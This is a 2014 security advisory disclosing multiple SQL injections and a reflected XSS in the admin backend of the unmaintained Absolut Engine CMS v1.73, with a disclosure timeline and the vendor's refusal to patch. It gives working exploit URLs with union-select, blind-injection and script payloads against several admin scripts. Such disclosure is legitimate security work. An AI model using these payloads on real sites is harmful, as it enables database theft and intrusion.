Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS
Advisory ID: SROEADV-2014-08
Author: Steffen Rösemann
Affected Software: CMS Absolut Engine v. 1.73
Vendor URL: http://www.absolutengine.com/
Vendor Status: solved
CVE-ID: -
==========================
Vulnerability Description:
==========================
The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
injection vulnerabilities and a XSS vulnerability in its administrative
backend.
==================
Technical Details:
==================
The following PHP-Scripts are prone to SQL injections:
*managersection.php (via sectionID parameter):*
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1*
*Exploit Example:*
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*
*edituser.php (via userID parameter):*
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*
*Exploit Example:*
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*
*admin.php (via username parameter, BlindSQLInjection):*
*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
*Exploit Example:*
*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
*managerrelated.php (via title parameter):*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*
*Exploit Example:*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*
The last PHP-Script is as well vulnerable to a Reflecting XSS
vulnerability.
*Exploit Example:*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*
Although this is a product which is not actively developed anymore, I
think it is worth mentioning as the idea (of the lists) are to keep
tracking (unknown) vulnerabilities in software products (but that is a
personally point of view).
Moreover, this product is still in use by some sites (!) and it is offered
without a hint of its status.
=========
Solution:
=========
As the CMS is not actively developed, it shouldn't be used anymore.
====================
Disclosure Timeline:
====================
29-Dec-2014 – found the vulnerability
29-Dec-2014 - informed the developers
29-Dec-2014 – release date of this security advisory [without technical
details]
30-Dec-2014 – Vendor responded, won't patch vulnerabilities
30-Dec-2014 – release date of this security advisory
30-Dec-2014 – post on FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.absolutengine.com/
http://sroesemann.blogspot.de